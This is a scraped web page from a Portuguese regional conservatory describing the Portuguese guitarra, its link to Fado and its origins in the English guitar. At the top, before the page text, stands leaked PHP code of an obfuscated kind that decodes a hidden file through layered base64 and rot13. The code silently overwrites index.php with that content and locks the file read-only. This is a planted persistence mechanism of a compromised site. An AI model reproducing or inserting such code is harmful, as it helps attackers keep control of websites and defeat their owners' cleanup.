$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Guitarra Portuguesa – Conservatório Regional do Baixo Alentejo

Guitarra Portuguesa

A Guitarra Portuguesa é um instrumento de corda associado frequentemente ao Fado, género musical incluído desde 2011 na Lista Representativa do Património Cultural Imaterial da Humanidade (UNESCO). Encontrando-se também pontualmente presente em outros domínios musicais como, por exemplo, as tunas académicas ou as orquestras típicas, foi sobretudo a partir da segunda metade do século XX que vários músicos e compositores como por exemplo Artur Paredes (1899 – 1980), Carlos Paredes (1925 – 2004) ou Pedro Caldeira Cabral (1950 – ) começaram a explorar as enormes potencialidades musicais da Guitarra Portuguesa, criando um diálogo entre domínios musicais tão diversificados como, por exemplo, o Fado, a música dita “erudita”, a Canção de Coimbra ou o Jazz. Ao que parece, a moderna Guitarra Portuguesa, com as variantes de Coimbra e de Lisboa, relaciona-se diretamente com a Guitarra Inglesa introduzida no Porto durante o século XVIII pela comunidade britânica que se dedicava à produção e ao comércio de vinhos do Porto tendo sido, posteriormente, copiada e adaptada por inúmeros violeiros portugueses, acabando por se disseminar e popularizar em praticamente todo o país.